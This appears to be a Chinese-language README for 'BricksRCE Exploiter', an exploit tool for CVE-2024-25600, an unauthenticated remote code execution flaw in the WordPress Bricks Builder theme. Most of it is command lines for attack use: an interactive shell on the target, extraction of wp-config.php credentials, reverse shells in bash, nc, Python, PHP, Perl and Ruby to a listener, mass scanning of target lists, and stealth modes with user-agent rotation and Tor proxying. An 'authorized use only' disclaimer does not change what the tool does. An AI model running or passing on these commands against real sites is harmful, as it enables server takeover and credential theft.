CVE-2024-25600 - WordPress Bricks Builder主题的未认证RCE漏洞利用。高级漏洞利用框架,具有交互式shell、反向shell、文件上传/下载、异步扫描、隐身模式、代理支持和多线程漏洞扫描。仅用于授权安全测试。
CVE-2024-25600 授权安全评估工具
作者:Sudeepa Wanigarathna · 工具:BricksRCE Exploiter v1.0
主脚本:cve-2024-25600.py
[!IMPORTANT] 仅限授权使用。 本工具仅用于安全研究、教育以及测试您拥有或已获得明确书面许可的系统。未经授权访问计算机系统是非法的。作者对滥用行为不承担任何责任。
CVE-2024-25600 是 WordPress Bricks Builder 主题中的一个严重、未认证的远程代码执行漏洞。在 render_element REST 端点中对用户控制的输入处理不当,允许未认证的攻击者在受影响的目标上执行任意 PHP/系统命令。
BricksRCE Exploiter(cve-2024-25600.py)是一款功能全面的 Python 评估工具,供授权安全专业人员使用,用于:
| 属性 | 值 |
|---|---|
| CVE ID | CVE-2024-25600 |
| CVSS | 9.8(严重) |
| 攻击向量 | 网络——未认证 |
| 影响 | 完全远程代码执行,危及机密性/完整性/可用性 |
| 受影响产品 | WordPress Bricks Builder 主题 |
| 受影响版本 | Bricks ≤ 1.9.6(已在 1.9.6.1+ 中修补) |
| 漏洞类型 | 未认证远程代码执行 |
| CWE | CWE-94(代码生成控制不当) |
| 端点 | 方法 |
|---|---|
/wp-json/bricks/v1/render_element | POST |
/?rest_route=/bricks/v1/render_element | POST |
render_element 请求| 能力 | 描述 |
|---|---|
| 漏洞检测 | 通过受控标记探测确认 RCE |
| Nonce 提取 | 多种 nonce 发现方式(脚本、页面源码、meta、REST) |
| 版本检测 | 从 CSS / readme / REST 识别 Bricks Builder 版本 |
| 交互式 Shell | 完整的 REPL,支持历史记录、自动补全和文件传输 |
| 单命令模式 | 执行一条命令后退出(便于脚本化使用) |
| 反弹 Shell 辅助 | 生成 bash / nc / Python / PHP / Perl / Ruby 反弹 shell |
| wp-config 提取 | 尝试定位并读取 wp-config.php |
| 批量扫描 | 从 URL 列表中异步或线程化多目标扫描 |
| 能力 | 描述 |
|---|---|
| 速率限制 | 请求间可配置延迟 |
| 重试逻辑 | 超时和连接错误时指数退避 |
| User-Agent 轮换 | 每个请求随机生成浏览器指纹 |
| 隐身模式 | 随机化 Accept-Language / Accept-Encoding 头 |
| 代理支持 | HTTP、HTTPS、SOCKS5 / SOCKS5h |
| 双端点 | 优先使用 wp-json、rest_route 或两者 |
| 强制模式 | 跳过预检查,直接尝试利用 |
| 富 CLI | 通过 Rich 实现进度条、表格和彩色面板 |
| 能力 | 描述 |
|---|---|
| JSON / TXT 导出 | 保存扫描结果和受感染目标 |
| 命令历史 | 可选的已执行命令日志 |
| 文件日志 | 持久化 bricks_rce.log 及自定义日志路径 |
pipgit clone https://github.com/CerberusMrXi/WP-Bricks-Exploit-CVE-2024-25600.git
cd WP-Bricks-Exploit-CVE-2024-25600
python3 -m venv venv
source venv/bin/activate # Windows: venv\Scripts\activate
pip install -r requirements.txt
python3 cve-2024-25600.py --help
requests>=2.31.0
aiohttp>=3.9.0
beautifulsoup4>=4.12.0
lxml>=4.9.0
prompt-toolkit>=3.0.0
rich>=13.7.0
pysocks>=1.7.0 # 可选 — SOCKS5 代理支持
将
https://target.example替换为实验环境或已授权的目标。
# 交互式 Shell
python3 cve-2024-25600.py -u https://target.example
# 单命令
python3 cve-2024-25600.py -u https://target.example --cmd "id"
# 批量扫描
python3 cve-2024-25600.py -f targets.txt -t 20 -o results.json
# 版本检测
python3 cve-2024-25600.py -u https://target.example --detect-version
# 通过 Burp 代理
python3 cve-2024-25600.py -u https://target.example --proxy http://127.0.0.1:8080 -v
所有示例均使用主脚本:
cve-2024-25600.py
python3 cve-2024-25600.py --help
在确认目标存在漏洞后,打开一个交互式 RCE Shell。
python3 cve-2024-25600.py -u https://target.example
工作流程:
--force)python3 cve-2024-25600.py -u https://target.example --cmd "whoami"
将命令输出保存到文件:
python3 cve-2024-25600.py -u https://target.example --cmd "id" --save-output
# 默认 PHP 异常型 payload
python3 cve-2024-25600.py -u https://target.example --cmd "uname -a" --payload php
# system() 型 payload
python3 cve-2024-25600.py -u https://target.example --cmd "uname -a" --payload system
python3 cve-2024-25600.py -u https://target.example --detect-version
与命令结合使用:
python3 cve-2024-25600.py -u https://target.example --detect-version --cmd "id"
python3 cve-2024-25600.py -u https://target.example --extract-wp-config
成功时保存为 wp-config_<target>.txt。
# 终端 1 — 监听器
nc -lvnp 4444
# 终端 2 — bash 反弹 Shell
python3 cve-2024-25600.py -u https://target.example \
--reverse-shell bash \
--lhost 10.0.0.5 \
--lport 4444
所有支持的反弹 Shell 类型:
python3 cve-2024-25600.py -u https://target.example --reverse-shell bash --lhost 10.0.0.5 --lport 4444
python3 cve-2024-25600.py -u https://target.example --reverse-shell nc --lhost 10.0.0.5 --lport 4444
python3 cve-2024-25600.py -u https://target.example --reverse-shell python --lhost 10.0.0.5 --lport 4444
python3 cve-2024-25600.py -u https://target.example --reverse-shell php --lhost 10.0.0.5 --lport 4444
python3 cve-2024-25600.py -u https://target.example --reverse-shell perl --lhost 10.0.0.5 --lport 4444
python3 cve-2024-25600.py -u https://target.example --reverse-shell ruby --lhost 10.0.0.5 --lport 4444
python3 cve-2024-25600.py -u https://target.example --force --cmd "uname -a"
# targets.txt — 每行一个 URL
python3 cve-2024-25600.py -f targets.txt
带线程、延迟、隐身模式和 JSON 输出:
python3 cve-2024-25600.py -f targets.txt \
-t 15 \
--delay 0.5 \
--stealth \
-o vulnerable.json
同步(线程池)扫描(替代异步):
python3 cve-2024-25600.py -f targets.txt --sync -t 10 -o results.txt
静默批量扫描:
python3 cve-2024-25600.py -f targets.txt -q -o results.json
# 两个端点(默认)
python3 cve-2024-25600.py -u https://target.example --endpoint both
# 仅 /wp-json/bricks/v1/render_element
python3 cve-2024-25600.py -u https://target.example --endpoint json
# 仅 /?rest_route=/bricks/v1/render_element
python3 cve-2024-25600.py -u https://target.example --endpoint rest_route
python3 cve-2024-25600.py -u https://target.example \
--stealth \
--delay 1.0 \
--max-retries 5 \
--timeout 20
# 自定义 UA
python3 cve-2024-25600.py -u https://target.example \
--user-agent "Mozilla/5.0 (compatible; SecurityScanner/1.0)"
# 禁用随机 UA 轮换
python3 cve-2024-25600.py -u https://target.example --no-random-ua
# HTTP 代理(例如 Burp Suite)
python3 cve-2024-25600.py -u https://target.example --proxy http://127.0.0.1:8080 -v
# SOCKS5 代理
python3 cve-2024-25600.py -u https://target.example --proxy socks5://127.0.0.1:9050
# SOCKS5h(通过代理/Tor 进行 DNS 解析)
python3 cve-2024-25600.py -u https://target.example --proxy socks5h://127.0.0.1:9050
# 启用 SSL 证书验证(默认禁用)
python3 cve-2024-25600.py -u https://target.example --verify-ssl